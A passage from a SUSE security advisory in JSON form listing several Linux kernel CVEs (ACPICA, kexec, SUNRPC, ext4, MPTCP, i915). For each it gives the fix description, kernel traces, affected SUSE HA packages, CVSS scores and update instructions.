"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71126",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71126"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: avoid deadlock on fallback while reinjecting\n\nJakub reported an MPTCP deadlock at fallback time:\n\n WARNING: possible recursive locking detected\n 6.18.0-rc7-virtme #1 Not tainted\n --------------------------------------------\n mptcp_connect/20858 is trying to acquire lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280\n\n but task is already holding lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n other info that might help us debug this:\n Possible unsafe locking scenario:\n\n CPU0\n ----\n lock(\u0026msk-\u003efallback_lock);\n lock(\u0026msk-\u003efallback_lock);\n\n *** DEADLOCK ***\n\n May be due to missing lock nesting notation\n\n 3 locks held by mptcp_connect/20858:\n #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0\n #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0\n #2: ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n stack backtrace:\n CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full)\n Hardware name: Bochs, BIOS Bochs 01/01/2011\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_deadlock_bug.cold+0xc0/0xcd\n validate_chain+0x2ff/0x5f0\n __lock_acquire+0x34c/0x740\n lock_acquire.part.0+0xbc/0x260\n _raw_spin_lock_bh+0x38/0x50\n __mptcp_try_fallback+0xd8/0x280\n mptcp_sendmsg_frag+0x16c2/0x3050\n __mptcp_retrans+0x421/0xaa0\n mptcp_release_cb+0x5aa/0xa70\n release_sock+0xab/0x1d0\n mptcp_sendmsg+0xd5b/0x1bc0\n sock_write_iter+0x281/0x4d0\n new_sync_write+0x3c5/0x6f0\n vfs_write+0x65e/0xbb0\n ksys_write+0x17e/0x200\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7fa5627cbc5e\n Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 \u003cc9\u003e c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa\n RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001\n RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e\n RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005\n RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920\n R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c\n\nThe packet scheduler could attempt a reinjection after receiving an\nMP_FAIL and before the infinite map has been transmitted, causing a\ndeadlock since MPTCP needs to do the reinjection atomically from WRT\nfallback.\n\nAddress the issue explicitly avoiding the reinjection in the critical\nscenario. Note that this is the only fallback critical section that\ncould potentially send packets and hit the double-lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71126",
"url": "https://www.suse.com/security/cve/CVE-2025-71126"
},
{
"category": "external",
"summary": "SUSE Bug 1256755 for CVE-2025-71126",
"url": "https://bugzilla.suse.com/1256755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71126"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
